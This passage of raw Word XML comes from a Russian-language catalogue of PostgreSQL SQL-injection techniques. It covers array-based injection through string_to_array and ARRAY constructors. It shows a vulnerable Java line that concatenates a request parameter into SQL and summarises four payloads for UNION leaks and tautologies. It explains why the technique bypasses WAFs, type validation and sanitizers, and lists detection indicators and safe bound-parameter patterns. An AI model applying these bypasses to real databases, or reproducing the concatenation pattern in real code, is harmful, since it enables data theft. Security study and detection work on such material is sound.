        <w:t>String sql = "SELECT * FROM users WHERE id IN (:ids)";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7B799C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>jdbcTemplate.queryForList(sql, new MapSqlParameterSource("ids", List.of(1, 2, 3)));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F515BC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// pgjdbc-template разворачивает в: SELECT * FROM users WHERE id IN (?, ?, ?) с bind [1, 2, 3]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594FB2C0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Это безопасный паттерн. Но если приложение использует unnest() для эквивалентной функциональности:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61894757" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>String sql = "SELECT * FROM users WHERE id IN (SELECT unnest(?::int[]))";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A82BB68" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>jdbcTemplate.queryForList(sql, idArray);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="345C66B7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Здесь </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>idArray</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — JDBC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Array</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> объект. Если атакующий контролирует array-содержимое (через JSON-десериализацию, например), он может </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>внутри элемента array</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> инжектировать неожиданное значение... но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>не SQL</w:t>
      </w:r>
      <w:r>
        <w:t>, потому что элемент идёт как typed binding, не как text.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57DD3D77" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Реальная атака — когда array-конструируется на app-level через concat:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8BE6E7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>String idsStr = request.getParameter("ids");  // "1,2,3"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B26229A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>String sql = "SELECT * FROM users WHERE id IN (SELECT unnest(string_to_array('" + idsStr + "', ',')::int[]))";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="610A635B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Идентично Payload A, но в JDBC-окружении. Точка инъекции — string_to_array.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66928C19" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Что произойдёт</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F158675" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Payload A</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — UNION injection через string_to_array; leak любых таблиц.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D3F526" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Payload B</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — UNION через ARRAY-constructor без list-element-валидации.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39706096" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Payload C</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — boolean-tautology через PG array literal + OR true; обход whitelist.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="273633A9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Payload D</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — JDBC-эквивалент Payload A.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="656893B6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Почему этот приём проходит фильтр</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F7AB98" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>WAF на `=` или `IN`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> не покрывает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ANY()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — это альтернативный синтаксис.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="737ED76F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>WAF на `UNION SELECT`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ловится — но через 3.9.6 (whitespace) или 3.9.5 (encoding) обходится. 3.11.4 — это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>точка входа</w:t>
      </w:r>
      <w:r>
        <w:t>; downstream leak использует общие методы из 3.1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="641BA8D8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Type-validation Pydantic</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> работает на typed params (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>list[int]</w:t>
      </w:r>
      <w:r>
        <w:t>); обходится через unstructured типы (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>str</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>list[str]</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1429597D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sanitizer на скобки</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> не работает для PG-array-literals — там скобки фигурные </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{...}</w:t>
      </w:r>
      <w:r>
        <w:t>, не круглые.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115ABCEC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Почему PostgreSQL принимает результат как валидный SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="610E592A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`string_to_array(text, text)`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — стабильная built-in (PG 7.x+). Принимает любой text как input, любой text как separator (1 символ или multi-char).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E7F7945" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`ARRAY[...]`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — array-constructor expression; элементы могут быть любым SQL-выражением, включая subquery (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ARRAY[SELECT id FROM t]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — синтаксис не поддерживается; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ARRAY(SELECT ...)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — поддерживается, subquery в array).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B5C442C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`'{a, b, c}'::int[]`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — array literal в text form. PG-парсер принимает любой text перед </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>::int[]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; cast выполняется в runtime; на invalid form — ошибка </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>malformed array literal</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB052C8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`= ANY(array)`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — SQL-стандартный оператор. Эквивалент </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>x IN (unnest(array))</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для optimizer'а.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="106493CF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`x @&gt; y`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — containment. Для array оба должны быть array-типов; PG cast не auto-промотирует scalar в array.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8714CF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Требования к среде</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42363446" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PostgreSQL 7.x+</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для базовых array; 9.x+ для современных операторов.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34802AA3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Привилегии</w:t>
      </w:r>
      <w:r>
        <w:t>: PUBLIC. SELECT на target.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F07473" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Application-код</w:t>
      </w:r>
      <w:r>
        <w:t>: f-string или concat с array-aргументом. Параметризация через bind variable (массив через driver typed-array) защищает.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB03353" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Managed</w:t>
      </w:r>
      <w:r>
        <w:t>: работает идентично.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44ADBEEF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Как выглядит легитимное использование</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5882B11D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   **</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT * FROM users WHERE id = ANY(:ids)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> через </w:t>
      </w:r>
      <w:r>
        <w:t>bind value** (driver typed-array) — безопасно.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D17AA8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   **</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT * FROM t WHERE tags @&gt; ARRAY[$1, $2]::text[]</w:t>
      </w:r>
      <w:r>
        <w:t>** через bind — безопасно.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="075B3FB3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>string_to_array в reporting</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT count(*) FROM unnest(string_to_array(:input, ','))</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — безопасно если </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:input</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — bind.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A76023" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Атака отличается:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1FFBB3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>f-string или concat в array-aргумент</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — runtime construction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3807EBD4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`string_to_array('` с user-input</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — типичный анти-паттерн.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22EEE9C7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Containment-операторы (`@&gt;`, `&lt;@`, `&amp;&amp;`) с user-controlled array literal в text-form</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — индикатор type-confusion attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="428B2EE4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`'{...}'::int[]` в pg_stat_statements с переменным содержимым `{...}`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — массовая array-literal-injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7092B21F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Версии</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C85289" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PostgreSQL 7.x – 17</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — array-фичи стабильны.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E13349A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PostgreSQL 11+</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — multidimensional array-subscripting (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>a[1][2]</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D5C1D4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PostgreSQL 14+</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — subscript-syntax для jsonb (комбо с 3.11.2).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5079993D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Managed</w:t>
      </w:r>
      <w:r>
        <w:t>: работает идентично.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F88DFA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Связанные паттерны</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="516BA156" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
